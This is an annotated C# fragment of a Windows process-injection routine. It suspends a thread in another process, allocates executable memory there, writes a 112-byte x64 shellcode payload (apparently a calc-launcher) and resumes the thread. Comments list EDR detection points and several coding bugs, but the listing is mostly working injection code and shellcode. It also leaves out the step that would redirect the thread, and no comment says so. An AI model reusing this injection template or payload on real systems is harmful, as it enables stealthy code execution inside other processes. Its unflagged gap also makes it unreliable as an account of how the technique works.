// Fragment of a cross-process code-injection routine built on the thread-hijack primitive:
// suspend a thread in the target process, read its CONTEXT, allocate an RWX region in the
// target, write a position-independent buffer there, then resume the thread.
// The enclosing method, the P/Invoke declarations (OpenThread, SuspendThread, GetThreadContext,
// OpenProcess, VirtualAllocEx, WriteProcessMemory, ResumeThread), the CONTEXT64 struct and the
// access/allocation constants are all declared outside this listing.
//
// Defender's notes — every step below is a well-known telemetry point for EDR / ETW-TI:
//   * cross-process OpenThread/OpenProcess handle grants carrying suspend/context rights and
//     VM_OPERATION|VM_WRITE from an unrelated image,
//   * VirtualAllocEx with PAGE_EXECUTE_READWRITE in a remote process,
//   * WriteProcessMemory into an executable region followed shortly by a thread resume.
// Seen together these are a high-confidence injection indicator; debuggers are the main
// benign source and are normally allow-listable by signed image.

// Takes the first process with the given image name; throws IndexOutOfRangeException when none is running.
Process targetProcess = Process.GetProcessesByName(Processname)[0];
// Threads[0] is simply the first entry of the thread snapshot, not necessarily the primary thread.
ProcessThread pT = targetProcess.Threads[0];
// ThreadAccess.THREAD_HIJACK is a project-defined mask, not a Win32 name; presumably it combines
// suspend/resume and get/set-context rights — confirm against its enum declaration.
IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
// Return value (previous suspend count, or -1 on failure) is ignored, so a failed suspend goes unnoticed.
SuspendThread(pOpenThread);
CONTEXT64 tContext = new CONTEXT64();
tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
if (GetThreadContext(pOpenThread, ref tContext))
{
    // NOTE: this overload is Show(text, caption) — "{0}" is never substituted and the RIP value
    // ends up in the title bar. The "Eip" label is also stale for a 64-bit context (it is Rip).
    MessageBox.Show("CurrentEip : {0}", tContext.Rip.ToString());
}
// Opaque 112-byte x64 payload, not analyzed here. It visibly embeds the ASCII bytes "calc"
// (0x63 0x61 0x6c 0x63) and "WinE" (0x57 0x69 0x6e 0x45), which looks like a launch-calc demo
// payload — TODO confirm by disassembly before relying on that.
byte[] payload = new byte[112] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Trailer appended after the payload: opcode bytes for `mov rax, imm64` ...
byte[] mov_rax = new byte[2] {
0x48, 0xb8
};
// ... where the immediate is the RIP captured above (8 bytes, little-endian) ...
byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
// ... followed by `jmp rax`, so the thread would return to where it was interrupted.
byte[] jmp_rax = new byte[2] {
0xff, 0xe0
};
// Concatenate payload + mov rax,<rip> + jmp rax into one contiguous buffer.
byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
payload.CopyTo(shellcode, 0);
mov_rax.CopyTo(shellcode, payload.Length);
jmp_address.CopyTo(shellcode, payload.Length + mov_rax.Length);
jmp_rax.CopyTo(shellcode, payload.Length + mov_rax.Length + jmp_address.Length);
// Process handle requesting thread-creation, query and VM operate/read/write rights (constants declared elsewhere).
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Remote RWX allocation. Marshal.SizeOf(typeof(char)) is 1 (char marshals as an ANSI byte by default),
// so the size is shellcode.Length + 1 bytes. The result is never compared with IntPtr.Zero.
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten;
// Writes the buffer into the remote region. The requested length is one byte past the end of the
// managed array, and neither resp1 nor bytesWritten is ever inspected afterwards.
bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
MessageBox.Show("Redirecting execution!");
// Resumes the suspended thread. pOpenThread and procHandle are never passed to CloseHandle,
// so both kernel handles leak for the lifetime of the calling process.
ResumeThread(pOpenThread);
return;